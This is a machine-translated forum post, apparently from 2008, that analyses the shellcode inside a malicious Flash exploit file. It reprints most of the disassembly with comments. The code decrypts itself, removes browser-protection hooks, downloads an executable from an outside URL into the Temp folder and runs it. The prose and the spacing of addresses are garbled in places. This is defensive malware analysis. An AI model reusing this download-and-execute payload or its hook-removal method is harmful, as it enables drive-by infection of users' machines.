the flash vulnerability used in shellcode analysis-vulnerability warning-the black bar safety net

2008-06-03T00:00:00
ID MYHACK58:62200819240
Type myhack58
Reporter 佚名
Modified 2008-06-03T00:00:00

Description

Title: 【original】flash vulnerability used in shellcode analysis Author: Regulus small Cong Time: 2008-06-02,1 9:2 9 Links: http://bbs.pediy.com/showthread.php?t=65907

Author home page: http://hi.baidu.com/yicong2007 The purpose: purely to learn, do not for malicious purposes

In recent days flash vulnerabilities net horse very popular, so I want to analyze the shellcode is how to run.

But capacity constraints, it is difficult to like the big cow are the same as the positioning to a vulnerability of the code and observe the whole overflow process. In Is that I can only do the back part of the work, i.e. look at that deformity the flash file of the shellcode looks even Either way it's up and running what will be the action.

I used is from the website catch down the win 9,0,115,0 ie. swf. Easily in the deformity. swf file Find the shellcode's location, in the file header offset 0xEB at start. Then I will this section of shellcode to copy Shellfish to an executable file of the entry point at the beginning, so I can be in OD is directly debug the shellcode.

During debugging I found that due to the flash this time of vulnerability, really gave a very ample space for the writer Enjoy to play their shellcode to write to, I saw a than ever any one use ActiveX Vulnerability shellcode to complex shellcode and.

The shellcode function is very comprehensive, not only has the General shellcode xor encryption, get the API address. Download the virus and run the operation, there is more to the operation so that the shellcode is more tough and practical. These operations include:

1. shellcode effective time limit, when found the system time is later than the shellcode stored in a fixed Time, directly ExitThread。 This should be the flash network horse generator publishers do, and may be for commercial Into account, to avoid someone else by a simple modification of the virus URL address and generate your own using the file.

2. From kernel32. dll in the input table to take ZwCreateProcessEx, And ZwWriteVirtualMemory to The address of these two addresses for the inline hook, hook to itself to save the corresponding original code, and CreateProcessInternalW the first few bytes for the inline hook reduction. These operations are for MAXTHON, etc. using the above API HOOK way for the browser to perform a Save of the measures While the introduction of anti way. Although this method has already been proposed, is all well known, but in the previous net horse Applications, since the available buffer is not so big, not suitable for the addition of these extra code, so I a Straight not see the restore hook through the browser protection of the method of actual use. And in this time, I finally saw one Actual use examples.

3. Use CreateProcessInternalA were last downloaded to the machine the virus file is executed. The previous one Like shellcode is to use WinExec to. Here is shellcode execution flow analysis, the analysis of the basic in the comment, the reference Numeral(1)、(2)...... Is the code The execution of the process sequence, in accordance with the label will be easy to understand the whole process.

First start is a xor decryption, each of the two bytes with 0x4522 XOR.

0 0 4 0 7 0 0 0 > /EB 1 6 jmp short 0 0 4 0 7 0 1 8 ; (1)F8 0 0 4 0 7 0 0 2 |5B pop ebx ; (3) 0 0 4 0 7 0 0 3 |33C9 xor ecx, ecx 0 0 4 0 7 0 0 5 |6 6:B8 2 2 4 5 mov ax, 4 5 2 2 0 0 4 0 7 0 0 9 |6 6:31044B xor word ptr [ebx+ecx*2], ax ; xor decryption 0040700D |4 1 inc ecx 0040700E |4 0 inc eax 0040700F |6 6:81F9 6 2 0 1 cmp cx, 1 6 2 0 0 4 0 7 0 1 4 ^|7C F3 jl short 0 0 4 0 7 0 0 9 ; (4)cycle, in the following sentence F4 0 0 4 0 7 0 1 6 |EB 0 5 jmp short 0040701D ; (5)then the F8 bit, jump into the decrypted code 0 0 4 0 7 0 1 8 \E8 E5FFFFFF call 0 0 4 0 7 0 0 2 ; (2)F7

Next is the decryption of the actual code

The first is to obtain the kernel32. dll the API function address and fill in the following data area. Here is a The commonly used method, by the PEB to get kernel32. dll base address, and then by traversing the output table, to each The name of the function string through an encryption operation, then the result with the input value, and then find the line with the API function position.

0040701D E9 6 5 0 2 0 0 0 0 jmp 0 0 4 0 7 2 8 7 ; (6)decrypt the future generations of code at the beginning, jump to the last 0 0 4 0 7 0 2 2 5F pop edi ; (8)locate its own address, this time for the later data area address 0 0 4 0 7 0 2 3 6A 3 0 push 3 0 0 0 4 0 7 0 2 5 5 9 pop ecx 0 0 4 0 7 0 2 6 6 4:8B01 mov eax, dword ptr fs:[ecx] ; _PEB 0 0 4 0 7 0 2 9 8B98 A8000000 mov ebx, dword ptr [eax+A8] ; _PEB. OSMijorVersion 0040702F 8B40 0C mov eax, dword ptr [eax+C] 0 0 4 0 7 0 3 2 8B70 1C mov esi, dword ptr [eax+1C] 0 0 4 0 7 0 3 5 AD lods dword ptr [esi] 0 0 4 0 7 0 3 6 8B68 0 8 mov ebp, dword ptr [eax+8] ; (9)kernel32. dll base address into ebp 0 0 4 0 7 0 3 9 8BF7 mov esi, edi 0040703B 81EC 0 0 0 2 0 0 0 0 sub esp, 2 0 0 0 0 4 0 7 0 4 1 85DB test ebx, ebx 0 0 4 0 7 0 4 3 7 5 0 7 jnz short 0040704C ; (1 0)judge 2 0 0 0 the system is still XP, I here is XP, directly jump away 0 0 4 0 7 0 4 5 C746 2 4 C9525E5>mov dword ptr [esi+2 4], 535E52C9 ; if so 2 0 0 0 Department of System, then modify the following data 0040704C 6A 0 9 push 9 0040704E 5 9 pop ecx 0040704F E8 EE010000 call 0 0 4 0 7 2 4 2 ; (1 1)where F8 can be, in accordance with the data area at the beginning of the Several encryption result, the traversal of the output table to find a function, the function address overwrite the original encrypted result 0 0 4 0 7 0 5 4 ^ E2 F9 loopd short 0040704F ; cycle, directly below F4

Here to fill the API address in order for this time relative to esi the offset, i.e., the following call is used when the[esi+XX] The XX is the sequence) 0x00 LoadLibraryA 0x04 GetTempPathA 0x08 DeleteFileA 0x0C CreateProcessInternalA 0x10 ExitThread, 0x14 VirtualProtect 0x18 CreateProcessInternalW 0x1C CompareFileTime 0x20 GetSystemTimeAsFileTime

Then search the memory to obtain a“retn”command position of the actually is not necessarily the retn command, for later anti-debug.

0 0 4 0 7 0 5 6 4 0 inc eax ; GetSystemTimeAsFileTime 0 0 4 0 7 0 5 7 8 0 3 8 C3 cmp byte ptr [eax], 0C3 0040705A ^ 7 5 FA jnz short 0 0 4 0 7 0 5 6 ; (1 2)loop search memory characteristics, is actually in order to borrow With a retn code to change program flow of the anti-debugging 0040705C 8 9 4 6 3 0 mov dword ptr [esi+3 0], eax ; here the search is 7C801881

Then again traverse the kernel32. dll input table, then take two of the NATIVE API function address.

0040705F 6A 0 2 push 2 0 0 4 0 7 0 6 1 5 9 pop ecx 0 0 4 0 7 0 6 2 E8 9E010000 call 0 0 4 0 7 2 0 5 ; again the search output table to get function address 0 0 4 0 7 0 6 7 ^ E2 F9 loopd short 0 0 4 0 7 0 6 2

Here take the TO address is this when compared to esi the offset, i.e., the following call is used when the[esi+XX]in XX For the order)

0x24 ZwCreateProcessEx 0x28 ZwWriteVirtualMemory

Next is to use LoadLibraryA to load with. dll and obtain the URLDownloadToFileA function of the address. It is worth mentioning that this is not a direct call but with in the sub-function using the first push the return address then jmp.

0 0 4 0 7 0 6 9 6A 0 1 push 1 0040706B 5 9 pop ecx 0040706C 6 8 6F6E0000 push 6E6F 0 0 4 0 7 0 7 1 6 8 75726C6D push 6D6C7275 0 0 4 0 7 0 7 6 5 4 push esp ; 'with' 0 0 4 0 7 0 7 7 8B06 mov eax, dword ptr [esi] ; LoadLibraryA 0 0 4 0 7 0 7 9 E8 1 0 0 1 0 0 0 0 call 0040718E ; (1 3)a pure to anti-debug and engage out of Sub-function, directly in the next sentence, the next off, and then F9 will not run fly 0040707E 9 5 xchg eax, ebp ; with. dll base address into ebp 0040707F E8 BE010000 call 0 0 4 0 7 2 4 2 ; (1 4)and find the function address and save it directly to F8, To see the Find function is URLDownloadToFileA

URLDownloadToFileA function address is stored at[esi+2C]

In entering into substantive work before, that is, the additional operation.

The first is the time limit of verification 0 0 4 0 7 0 8 4 6 8 3D400000 push 403D 0 0 4 0 7 0 8 9 6A FF push -1 0040708B 6A FF push -1 0040708D 3E:DB2C24 fld tbyte ptr ds:[esp] 0 0 4 0 7 0 9 1 5 0 push eax ; just in the stack freeing the FILETIME structure of the memory space 0 0 4 0 7 0 9 2 5 0 push eax 0 0 4 0 7 0 9 3 5 4 push esp 0 0 4 0 7 0 9 4 FF56 2 0 call dword ptr [esi+2 0] ; GetSystemTimeAsFileTime 0 0 4 0 7 0 9 7 8BC4 mov eax, esp 0 0 4 0 7 0 9 9 6 8 6EC2C801 push 1C8C26E 0040709E 6 8 00C0B336 push 36B3C000 004070A3 5 4 push esp 004070A4 5 0 push eax 004070A5 FF56 1C call dword ptr [esi+1C] ; CompareFileTime 004070A8 4 8 dec eax 004070A9 7 5 0 3 jnz short 004070AE ; (1 6)system time, if later than the set time, the Do not jump away 004070AB FF56 1 0 call dword ptr [esi+1 0] ; thus it is directly ExitThread, Is this shellcode of the time limit

I debug, has been allowed to time out, so would have directly ExitThread, then you can self Hexyl forced the EIP is changed to the next sentence, do not let it exit, continue to debug.

The next part I think comparison let me unexpected, is what I mentioned earlier, the shellcode in its own preservation. The NATIVE API is the code, where the NATIVE API for the inline hook, the hook to shellcode comes with the original code, as well as the CreateProcessInternalW in front of a few bytes into the The line reduction, thus undermining some of the software the browser performs a protective function for yourself to perform is download the virus The program has cleared the obstacle, which is that it is better than I had seen the exploit shellcode.

The first is the self preservation of the NATIVE API as the code is copied to the PEB back of the space. The reason you want to copy to here, I want to run stable, if the inline hook point directly to the shellcode inside, then the shellcode executed after being cleaned off after the procedure and then call the appropriate NATIVE API Of time, it will crash out. Here is the code to copy into PEB space behind, you can guarantee that the shellcode exit After this portion of the address can still be normal access, the program can also run normally, at least looks like it.

004070AE 6A 3 0 push 3 0 004070B0 5 9 pop ecx 004070B1 6 4:8B19 mov ebx, dword ptr fs:[ecx] 004070B4 8DAB 0 0 0 4 0 0 0 0 lea ebp, dword ptr [ebx+4 0 0] ; (1 7)in the PEB structure behind Find a piece of empty memory 004070BA 8B9B A8000000 mov ebx, dword ptr [ebx+A8] 004070C0 8BFD mov edi, ebp 004070C2 5 6 push esi 004070C3 E9 E0000000 jmp 004071A8 ; (1 8)jump to the following 004070C8 5E pop esi ; (2 0)jump back to here 004070C9 F3:A5 rep movs dword ptr es:[edi], dword ptr [esi] ; put the following those Simulated NATIVE API code to copy into this block of memory, for later inline hook 004070CB 5E pop esi

Next, The“find”ZwCreateProcessEx and ZwWriteVirtualMemory the most front part of the repair Replaced by“push XXX,retn”style to jump to the previous copy of the code:

004070CC 8B7E 2 4 mov edi, dword ptr [esi+2 4] ; ZwCreateProcessEx 004070CF E8 2 5 0 1 0 0 0 0 call 004071F9 ; VirtualProtect modified function header, 0x20 for read and write 004070D4 6A 1A push 1A ; the following is directly to the ZwCreateProcessEx for inline hook 004070D6 6A 0D push 0D 004070D8 6A 0 0 push 0 004070DA 8BC5 mov eax, ebp 004070DC 03049C add eax, dword ptr [esp+ebx4] 004070DF C607 6 8 mov byte ptr [edi], 6 8 ; code"push......" 004070E2 4 7 inc edi 004070E3 AB stos dword ptr es:[edi] ; the in-memory copy of the code 004070E4 C607 C3 mov byte ptr [edi], 0C3 ; ret...... 004070E7 8B7E 2 8 mov edi, dword ptr [esi+2 8] ; ZwWriteVirtualMemory 004070EA E8 0A010000 call 004071F9 004070EF 6A 3D push 3D 004070F1 6A 3 6 push 3 6 004070F3 6A 2 7 push 2 7 004070F5 8BC5 mov eax, ebp 004070F7 03049C add eax, dword ptr [esp+ebx4] 004070FA C607 6 8 mov byte ptr [edi], 6 8 004070FD 4 7 inc edi 004070FE AB stos dword ptr es:[edi] 004070FF C607 C3 mov byte ptr [edi], 0C3

Why I particularly stressed that“to find the ZwCreateProcessEx and ZwWriteVirtualMemory address At” be? We must not forget that this approach is for some software, the punch with which software? I think MAXTHON2 is.

Search about MAXTHON2 browser implementation of the protection articles, long articles display, in MAXTHON2 it is The ZwCreateProcessEx and ZwWriteVirtualMemory to the IAT HOOK. And now, the shellcode from kernel32. dll in the input table to take ZwCreateProcessEx and ZwWriteVirtualMemory address, what does this mean? I boldly assume that, when MAXTHON2 visit exploit pages, shellcode execution environment in which In the process, then, when the shellcode from kernel32. dll in the input table to take to address, it is MAXTHON2 to hook off the results directly to the MAXTHON2 dll to go inside. This is a shellcode the author intentional, because then it to the two address code for the inline hook, and actually back to the original code. Such MAXTHON2 just completely not aware of their IAT HOOK failure was not the failure of the case Under its Executive protection is bypassed. The next action further confirms this, for CreateProcessInternalW at the beginning of the code also The original, which would be another positive for MAXTHON2 to CreateProcessInternalW the inlline hook it?!

0 0 4 0 7 1 0 2 8B7E 1 8 mov edi, dword ptr [esi+1 8] ; CreateProcessInternalW 0 0 4 0 7 1 0 5 E8 EF000000 call 004071F9 0040710A 6 8 68080A00 push 0A0868 0040710F 6 8 68080A00 push 0A0868 0 0 4 0 7 1 1 4 6 8 558BEC6A push 6AEC8B55 0 0 4 0 7 1 1 9 8B049C mov eax, dword ptr [esp+ebx4] 0040711C AB stos dword ptr es:[edi] ; restore the first few bytes, to restore inline hook 0040711D 33C0 xor eax, eax 0040711F 5 0 push eax 0 0 4 0 7 1 2 0 5 0 push eax 0 0 4 0 7 1 2 1 6A FF push -1 0 0 4 0 7 1 2 3 8B049C mov eax, dword ptr [esp+ebx4] 0 0 4 0 7 1 2 6 AA stos byte ptr es:[edi]

Done these operations, the shellcode finally get into their substantive work.

First, get the Temp folder address, and later was added“orz.exe”as the virus files of the local address

0 0 4 0 7 1 2 7 8DBE 3 3 0 1 0 0 0 0 lea edi, dword ptr [esi+1 3 3] 0040712D 5 7 push edi 0040712E 6 8 FF000000 push 0FF 0 0 4 0 7 1 3 3 FF56 0 to 4 call dword ptr [esi+4] ; GetTempPathA 0 0 4 0 7 1 3 6 03C7 add eax, edi 0 0 4 0 7 1 3 8 C700 6F727A2E mov dword ptr [eax], 2E7A726F ; to get the temp file Clip path later added to the file name 0040713E C740 0 4 6 5 7 8 6 5 0>mov dword ptr [eax+4], 6 5 7 8 6 5 ; added a file named "orz.exe"

For insurance, first try to put the path of file to delete.

0 0 4 0 7 1 4 5 5 7 push edi 0 0 4 0 7 1 4 6 FF56 0 8 call dword ptr [esi+8] ; DeleteFileA

And then directly invoke URLDownloadToFileA, from the remote address http://www. 0x4f. cn/test. exe under 载 病毒 文件 到 orz.exe

0 0 4 0 7 1 4 9 33DB xor ebx, ebx 0040714B 5 3 push ebx 0040714C 5 3 push ebx 0040714D 5 7 push edi 0040714E 8D46 3 4 lea eax, dword ptr [esi+3 4] ; a URL address of"http: //www.0x4f.cn/test.exe" 0 0 4 0 7 1 5 1 5 0 push eax 0 0 4 0 7 1 5 2 5 3 push ebx 0 0 4 0 7 1 5 3 FF56 2C call dword ptr [esi+2C] ; URLDownloadToFileA

Finally, the shellcode executes the downloaded file, note that it uses CreateProcessInternalA. Row. Since the front has been cleared for CreateProcessInternalW and ZwCreateProcessEx and ZwWriterVirtualMemory Protection, virus authors firmly believe that in this case the use of CreateProcessInternalA There is very likely to be successful.

0 0 4 0 7 1 5 6 33C0 xor eax, eax 0 0 4 0 7 1 5 8 8BFC mov edi, esp 0040715A 6A 1 2 push 1 2 0040715C 5 9 pop ecx 0040715D AB stos dword ptr es:[edi] 0040715E ^ E2 FD, loopd short 0040715D ; cycle, in the stack clear a full 0 space 0 0 4 0 7 1 6 0 6 6:C74424 3C 0 1>mov word ptr [esp+3C], 1 0 1 0 0 4 0 7 1 6 7 8BFC mov edi, esp 0 0 4 0 7 1 6 9 8D47 1 0 lea eax, dword ptr [edi+1 0] 0040716C 5 1 push ecx 0040716D 5 7 push edi 0040716E 5 0 push eax 0040716F 5 1 push ecx 0 0 4 0 7 1 7 0 5 1 push ecx 0 0 4 0 7 1 7 1 5 1 push ecx 0 0 4 0 7 1 7 2 5 1 push ecx 0 0 4 0 7 1 7 3 5 1 push ecx 0 0 4 0 7 1 7 4 5 1 push ecx 0 0 4 0 7 1 7 5 5 1 push ecx 0 0 4 0 7 1 7 6 8D96 3 3 0 1 0 0 0 0 lea edx, dword ptr [esi+1 3 3] ; 本地 地址 orz.exe 0040717C 5 2 push edx 0040717D 5 1 push ecx 0040717E FF56 0C call dword ptr [esi+C] ; CreateProcessInternalA 0 0 4 0 7 1 8 1 81C4 5 4 0 2 0 0 0 0 add esp, 2 5 4 0 0 4 0 7 1 8 7 6 1 popad 0 0 4 0 7 1 8 8 FF71 EC push dword ptr [ecx-1 4] ; here it should jump back to the original overflow bit Set, allow normal program run forever 0040718B C2 0 4 0 0 retn 4

The following is the previous code calls to sub-functions and data.

The first is a simulation call the function

0040718E 8B56 3 0 mov edx, dword ptr [esi+3 0] ; (1 4) 0 0 4 0 7 1 9 1 4 1 inc ecx 0 0 4 0 7 1 9 2 5B pop ebx 0 0 4 0 7 1 9 3 5 2 push edx 0 0 4 0 7 1 9 4 03E1 add esp, ecx 0 0 4 0 7 1 9 6 03E1 add esp, ecx 0 0 4 0 7 1 9 8 03E1 add esp, ecx 0040719A 03E1 add esp, ecx 0040719C 83EC 0 4 sub esp, 4 0040719F 5A pop edx 004071A0 5 3 push ebx 004071A1 8BDA mov ebx, edx 004071A3 ^ E2 F7 loopd short 0040719C 004071A5 5 2 push edx ; the return address into the stack, here is just a retn command 004071A6 FFE0 jmp eax ; jmp into the API function at the beginning

Next is the middle one in order to re-locate the return call to:

004071A8 E8 1BFFFFFF call 004070C8 ; (1 9)again in order to re-locate and jump back, there must be F7

Then next is copy the NATIVE API of the original code:

004071AD 6A 2 9 push 2 9 004071AF 5 8 pop eax 004071B0 3 6:8D5424 0 4 lea edx, dword ptr [esp+4] 004071B5 CD 2E int 2E 004071B7 C2 2 0 0 0 retn 2 0 004071BA 6A 3 0 push 3 0 004071BC 5 8 pop eax 004071BD BA 0003FE7F mov edx, 7FFE0300 004071C2 FF12 call dword ptr [edx] 004071C4 C2 2 0 0 0 retn 2 0 004071C7 6A 3 2 push push push 3 2 004071C9 5 8 pop eax 004071CA BA 0003FE7F mov edx, 7FFE0300 004071CF FF12 call dword ptr [edx] 004071D1 C2 2 4 0 0 retn 2 4 004071D4 B8 F0000000 mov eax, 0F0 004071D9 3 6:8D5424 0 4 lea edx, dword ptr [esp+4] 004071DE CD 2E int 2E 004071E0 C2 1 4 0 0 retn 1 4 004071E3 B8 1 5 0 1 0 0 0 0 mov eax, 1 1 5 004071E8 EB 0 5 jmp short 004071EF 004071EA B8 1F010000 mov eax, 11F 004071EF BA 0003FE7F mov edx, 7FFE0300 004071F4 FF12 call dword ptr [edx] 004071F6 C2 1 4 0 0 retn 1 4

Next is to use the VirtualProtect modified API function entry page protection attributes of the sub-function

004071F9 5 2 push edx 004071FA 5 4 push esp 004071FB 6A 0 4 push 4 004071FD 6A 2 0 push 2 0 004071FF 5 7 push edi 0 0 4 0 7 2 0 0 FF56 1 4 call dword ptr [esi+1 4] ; ViturlProtect, modify the function of the front 0x20 bytes for read and write 0 0 4 0 7 2 0 3 5A pop edx 0 0 4 0 7 2 0 4 C3 retn

Next is the traversal kernel32. dll input table to find the NATIVE API of the address of the function, these are common letter The number of shellcode with much more, just too lazy to re-comment.

0 0 4 0 7 2 0 5 5 1 push ecx 0 0 4 0 7 2 0 6 8B45 3C mov eax, dword ptr [ebp+3C] 0 0 4 0 7 2 0 9 4 5 inc ebp 0040720A 8B5C28 7F mov ebx, dword ptr [eax+ebp+7F] 0040720E 4D dec ebp 0040720F 03DD add ebx, ebp 0 0 4 0 7 2 1 1 8B13 mov edx, dword ptr [ebx] 0 0 4 0 7 2 1 3 03D5 add edx, ebp 0 0 4 0 7 2 1 5 33C9 xor ecx, ecx 0 0 4 0 7 2 1 7 4 9 dec ecx 0 0 4 0 7 2 1 8 4 1 inc ecx 0 0 4 0 7 2 1 9 8B048A mov eax, dword ptr [edx+ecx4] 0040721C 8D4428 0 2 lea eax, dword ptr [eax+ebp+2] 0 0 4 0 7 2 2 0 6 0 pushad 0 0 4 0 7 2 2 1 33C9 xor ecx, ecx 0 0 4 0 7 2 2 3 0FBE10 movsx edx, byte ptr [eax] 0 0 4 0 7 2 2 6 3AD6 cmp dl, dh 0 0 4 0 7 2 2 8 7 4 0 8 je short 0 0 4 0 7 2 3 2 0040722A C1C9 0 7 ror ecx, 7 0040722D 03CA add ecx, edx 0040722F 4 0 inc eax 0 0 4 0 7 2 3 0 ^ EB F1 jmp short 0 0 4 0 7 2 2 3 0 0 4 0 7 2 3 2 390F cmp dword ptr [edi], ecx 0 0 4 0 7 2 3 4 6 1 popad 0 0 4 0 7 2 3 5 ^ 7 5 E1 jnz short 0 0 4 0 7 2 1 8 0 0 4 0 7 2 3 7 8B43 1 0 mov eax, dword ptr [ebx+1 0] 0040723A 03C5 add eax, ebp 0040723C 8B0488 mov eax, dword ptr [eax+ecx4] 0040723F AB stos dword ptr es:[edi] 0 0 4 0 7 2 4 0 5 9 pop ecx 0 0 4 0 7 2 4 1 C3 retn

Code The contents of the last is traversing the PE file and output the table to give the API function the address of the sub-function, the same generic mold Block, also lazy to the N-th comment:

0 0 4 0 7 2 4 2 5 1 push ecx 0 0 4 0 7 2 4 3 5 6 push esi 0 0 4 0 7 2 4 4 8B75 3C mov esi, dword ptr [ebp+3C] 0 0 4 0 7 2 4 7 8B742E 7 8 mov esi, dword ptr [esi+ebp+7 8] 0040724B 03F5 add esi, ebp 0040724D 5 6 push esi 0040724E 8B76 2 0 mov esi, dword ptr [esi+2 0] 0 0 4 0 7 2 5 1 03F5 add esi, ebp 0 0 4 0 7 2 5 3 33C9 xor ecx, ecx 0 0 4 0 7 2 5 5 4 9 dec ecx 0 0 4 0 7 2 5 6 4 1 inc ecx 0 0 4 0 7 2 5 7 AD lods dword ptr [esi] 0 0 4 0 7 2 5 8 03C5 add eax, ebp 0040725A 33DB xor ebx, ebx 0040725C 0FBE10 movsx edx, byte ptr [eax] 0040725F 3AD6 cmp dl, dh 0 0 4 0 7 2 6 1 7 4 0 8 je short 0040726B 0 0 4 0 7 2 6 3 C1CB 0 7 ror ebx, 7 0 0 4 0 7 2 6 6 03DA add ebx, edx 0 0 4 0 7 2 6 8 4 0 inc eax 0 0 4 0 7 2 6 9 ^ EB F1 jmp short 0040725C 0040726B 3B1F cmp ebx, dword ptr [edi] 0040726D ^ 7 5 E7 jnz short 0 0 4 0 7 2 5 6 0040726F 5E pop esi 0 0 4 0 7 2 7 0 8B5E 2 4 mov ebx, dword ptr [esi+2 4] 0 0 4 0 7 2 7 3 03DD add ebx, ebp 0 0 4 0 7 2 7 5 6 6:8B0C4B mov cx, word ptr [ebx+ecx2] 0 0 4 0 7 2 7 9 8B5E 1C mov ebx, dword ptr [esi+1C] 0040727C 03DD add ebx, ebp 0040727E 8B048B mov eax, dword ptr [ebx+ecx4] 0 0 4 0 7 2 8 1 03C5 add eax, ebp 0 0 4 0 7 2 8 3 AB stos dword ptr es:[edi] 0 0 4 0 7 2 8 4 5E pop esi 0 0 4 0 7 2 8 5 5 9 pop ecx 0 0 4 0 7 2 8 6 C3 retn 0 0 4 0 7 2 8 7 E8 96FDFFFF call 0 0 4 0 7 0 2 2 ; (7)call back, where to F7

Code content end here, followed by the data area, including the preservation of the API function the address of the shellcode start For the encryption value, find the API address is replaced with the address of and the download virus URL, shellcode, award-winning Award-winning with[esi+XX]way to access this part of the content, in accordance with the relative offset as follows:

0x00 LoadLibraryA 0x04 GetTempPathA 0x08 DeleteFileA 0x0C CreateProcessInternalA 0x10 ExitThread, 0x14 VirtualProtect 0x18 CreateProcessInternalW 0x1C CompareFileTime 0x20 GetSystemTimeAsFileTime 0x24 ZwCreateProcessEx 0x28 ZwWriteVirtualMemory 0x2C URLDownloadToFileA 0x30 search to the sentence available for retn in the code address 0x34 ASCII "http://www.0x4f.cn/test.exe"

So far, the shellcode analysis is completed. Should say it is I see in practice features more full shellcode, the author of some of the concept are obvious practical purposes the tendency, also seen in the author to write shellcode have some experience and ability.

This analysis only relates to the shellcode for the action, for this vulnerability to be triggered and that the shellcode is The implementation, due to capacity constraints has not yet been able to explore it.

I limited capacity, this is just a rookie, the above analysis will inevitably be errors and omissions, also please feel free to correct me.